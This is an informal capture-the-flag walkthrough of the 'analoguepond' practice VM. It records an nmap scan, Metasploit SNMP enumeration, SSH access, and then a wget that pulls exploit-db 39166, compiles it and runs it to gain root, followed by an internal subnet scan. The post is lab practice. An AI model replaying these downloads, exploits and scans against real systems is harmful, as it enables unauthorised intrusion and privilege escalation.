It has been a wile since i solved a CTF. I decided to try to crack the analougepond from @knightmare2600.
First you need to put an appropriate soundtrack for this VM.
Nmap udp : root@kali:~# nmap -sS -sU -T4 -A -v 192.168.1.14 Starting Nmap 7.60 ( https://nmap.org ) at 2017-08-20 13:37 EDT NSE: Loaded 146 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 13:37 Completed NSE at 13:37, 0.00s elapsed Initiating NSE at 13:37 Completed NSE at 13:37, 0.00s elapsed Initiating ARP Ping Scan at 13:37 Scanning 192.168.1.14 [1 port] Completed ARP Ping Scan at 13:37, 0.23s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 13:37 Completed Parallel DNS resolution of 1 host. at 13:37, 0.01s elapsed Initiating SYN Stealth Scan at 13:37 Scanning 192.168.1.14 [1000 ports] Discovered open port 22/tcp on 192.168.1.14 Completed SYN Stealth Scan at 13:37, 1.26s elapsed (1000 total ports) Initiating UDP Scan at 13:37 Scanning 192.168.1.14 [1000 ports] Increasing send delay for 192.168.1.14 from 0 to 50 due to 11 out of 19 dropped probes since last increase. Increasing send delay for 192.168.1.14 from 50 to 100 due to max_successful_tryno increase to 5 Increasing send delay for 192.168.1.14 from 100 to 200 due to max_successful_tryno increase to 6 Warning: 192.168.1.14 giving up on port because retransmission cap hit (6). UDP Scan Timing: About 15.06% done; ETC: 13:41 (0:02:55 remaining) Increasing send delay for 192.168.1.14 from 200 to 400 due to 16 out of 39 dropped probes since last increase. UDP Scan Timing: About 19.39% done; ETC: 13:43 (0:04:14 remaining) Increasing send delay for 192.168.1.14 from 400 to 800 due to 11 out of 11 dropped probes since last increase. UDP Scan Timing: About 22.36% done; ETC: 13:44 (0:05:16 remaining) UDP Scan Timing: About 25.53% done; ETC: 13:45 (0:05:53 remaining) UDP Scan Timing: About 28.50% done; ETC: 13:46 (0:06:19 remaining) UDP Scan Timing: About 36.37% done; ETC: 13:48 (0:06:46 remaining) UDP Scan Timing: About 47.17% done; ETC: 13:49 (0:06:14 remaining) UDP Scan Timing: About 54.54% done; ETC: 13:50 (0:05:38 remaining) UDP Scan Timing: About 60.99% done; ETC: 13:50 (0:05:00 remaining) UDP Scan Timing: About 66.83% done; ETC: 13:51 (0:04:21 remaining) UDP Scan Timing: About 72.66% done; ETC: 13:51 (0:03:39 remaining) UDP Scan Timing: About 78.09% done; ETC: 13:51 (0:02:59 remaining) UDP Scan Timing: About 83.40% done; ETC: 13:51 (0:02:17 remaining) UDP Scan Timing: About 88.63% done; ETC: 13:51 (0:01:35 remaining) UDP Scan Timing: About 93.84% done; ETC: 13:51 (0:00:52 remaining) Discovered open port 161/udp on 192.168.1.14 Completed UDP Scan at 13:52, 904.80s elapsed (1000 total ports) Initiating Service scan at 13:52 Scanning 93 services on 192.168.1.14 Service scan Timing: About 3.23% done; ETC: 14:29 (0:35:30 remaining) Service scan Timing: About 35.48% done; ETC: 13:58 (0:03:49 remaining) Service scan Timing: About 36.56% done; ETC: 14:00 (0:04:34 remaining) Service scan Timing: About 68.82% done; ETC: 13:57 (0:01:34 remaining) Service scan Timing: About 76.34% done; ETC: 13:58 (0:01:18 remaining) Completed Service scan at 13:57, 262.62s elapsed (93 services on 1 host) Initiating OS detection (try #1) against 192.168.1.14 adjust_timeouts2: packet supposedly had rtt of -175682 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -175682 microseconds. Ignoring time. NSE: Script scanning 192.168.1.14. Initiating NSE at 13:57 Completed NSE at 13:57, 30.80s elapsed Initiating NSE at 13:57 Completed NSE at 13:57, 4.77s elapsed Nmap scan report for 192.168.1.14 Host is up (0.00045s latency). Not shown: 1907 closed ports, 91 open|filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 b8:83:a1:ee:76:be:b7:3f:b9:45:ad:b4:ba:47:8b:75 (DSA) | 2048 19:98:89:e1:d4:4c:42:2b:ca:da:37:79:99:1b:c9:ab (RSA) | 256 81:5d:1c:e1:2b:03:7d:e3:18:c3:bc:a0:cf:0b:f7:63 (ECDSA) |_ 256 73:0b:c9:69:8a:1d:1b:63:a3:68:ab:f5:c6:a8:c0:1c (EdDSA) 161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public) | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: f391e6401236975900000000 | snmpEngineBoots: 2 |_ snmpEngineTime: 27m55s | snmp-sysdescr: Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 |_ System uptime: 27m55.15s (167515 timeticks) MAC Address: 08:00:27:42:5B:7B (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.8 Uptime guess: 0.017 days (since Sun Aug 20 13:33:50 2017) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=261 (Good luck!) IP ID Sequence Generation: All zeros Service Info: Host: analoguepond; OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.45 ms 192.168.1.14 NSE: Script Post-scanning. Initiating NSE at 13:57 Completed NSE at 13:57, 0.00s elapsed Initiating NSE at 13:57 Completed NSE at 13:57, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1207.09 seconds Raw packets sent: 3054 (107.708KB) | Rcvd: 2011 (98.207KB) &nbsp; https://www.offensive-security.com/metasploit-unleashed/snmp-scan/ &nbsp; msf > use auxiliary/scanner/snmp/snmp_login msf auxiliary(snmp_login) > set rhost 192.168.1.14 [!] RHOST is not a valid option for this module. Did you mean RHOSTS? rhost => 192.168.1.14 msf auxiliary(snmp_login) > set rhosts 192.168.1.14 rhosts => 192.168.1.14 msf auxiliary(snmp_login) > set threads 10 threads => 10 msf auxiliary(snmp_login) > run [+] 192.168.1.14:161 - Login Successful: public (Access level: read-only); Proof (sysDescr.0): Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed &nbsp; msf auxiliary(snmp_enum) > set rhosts 192.168.1.14 rhosts => 192.168.1.14 msf auxiliary(snmp_enum) > run [+] 192.168.1.14, Connected. [*] System information: Host IP : 192.168.1.14 Hostname : analoguepond Description : Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 Contact : Eric Burdon <eric@example.com> Location : There is a house in New Orleans they call it... Uptime snmp : 01:29:23.40 Uptime system : 01:28:54.15 System date : 2017-8-23 01:20:44.0 &nbsp; [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ...THE RISING SUN... In the background of https://www.youtube.com/watch?v=5A-4VGfx5lU root@kali:~# ssh root@192.168.1.14 Warning: Permanently added '192.168.1.14' (ECDSA) to the list of known hosts. root@192.168.1.14's password: Permission denied, please try again. root@192.168.1.14's password: Permission denied, please try again. root@192.168.1.14's password: root@kali:~# ssh eric@192.168.1.14 eric@192.168.1.14's password: Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 3.19.0-25-generic x86_64) * Documentation: https://help.ubuntu.com/ System information as of Tue Aug 22 19:51:44 BST 2017 System load: 1.0 Memory usage: 2% Processes: 83 Usage of /: 82.3% of 5.39GB Swap usage: 0% Users logged in: 0 Graph this data and manage this system at: https://landscape.canonical.com/ eric@analoguepond:~$ ls reticulatingsplines.gif python -m SimpleHTTPServer 8080 Serving HTTP on 0.0.0.0 port 8080 ... 192.168.1.122 - - [23/Aug/2017 01:33:36] "GET /reticulatingsplines.gif HTTP/1.1" 200 - Cow joke lol https://www.exploit-db.com/exploits/39166/ eric@analoguepond:~$ wget https://www.exploit-db.com/download/39166 --2017-08-23 01:54:15-- https://www.exploit-db.com/download/39166 Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8 Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 2789 (2.7K) [application/txt] Saving to: ‘39166’ 100%[======================================>] 2,789 --.-K/s in 0s 2017-08-23 01:54:15 (470 MB/s) - ‘39166’ saved [2789/2789] eric@analoguepond:~$ ls 39166 reticulatingsplines.gif eric@analoguepond:~$ mv ./39166 ./39166.c eric@analoguepond:~$ ls 39166.c reticulatingsplines.gif eric@analoguepond:~$ gcc ./39166.c eric@analoguepond:~$ ls 39166.c a.out reticulatingsplines.gif eric@analoguepond:~$ ./a.out root@analoguepond:~# id uid=0(root) gid=1000(eric) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(libvirtd),112(lpadmin),113(sambashare),1000(eric) &nbsp; root@analoguepond:/root# cat /root/flag.txt C'Mon Man! Y'all didn't think this was the final flag so soon...? Did the bright lights and big city knock you out...? If you pull a stunt like this again, I'll send you back to Walker... This is obviously troll flah #1 So keep going. root@analoguepond:/root# ifconfig eth0 Link encap:Ethernet HWaddr 08:00:27:42:5b:7b inet addr:192.168.1.14 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: fe80::a00:27ff:fe42:5b7b/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:3213 errors:0 dropped:0 overruns:0 frame:0 TX packets:1469 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:273953 (273.9 KB) TX bytes:185237 (185.2 KB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:10 errors:0 dropped:0 overruns:0 frame:0 TX packets:10 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:748 (748.0 B) TX bytes:748 (748.0 B) virbr0 Link encap:Ethernet HWaddr 52:54:00:b2:23:25 inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:166 errors:0 dropped:0 overruns:0 frame:0 TX packets:149 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:11122 (11.1 KB) TX bytes:17147 (17.1 KB) root@analoguepond:/root# nmap -sn 192.168.122.0/24 Starting Nmap 6.40 ( http://nmap.org ) at 2017-08-23 02:15 BST Nmap scan report for puppet.example.com (192.168.122.2) Host is up (0.00081s latency). MAC Address: 52:54:00:5B:05:F7 (QEMU Virtual NIC) Nmap scan report for barringsbank.example.com (192.168.122.3) Host is up (0.00066s latency). MAC Address: 52:54:00:6D:93:6A (QEMU Virtual NIC) Nmap scan report for 192.168.122.1 Host is up. Nmap done: 256 IP addresses (3 hosts up) scanned in 2.12 seconds
To be continued…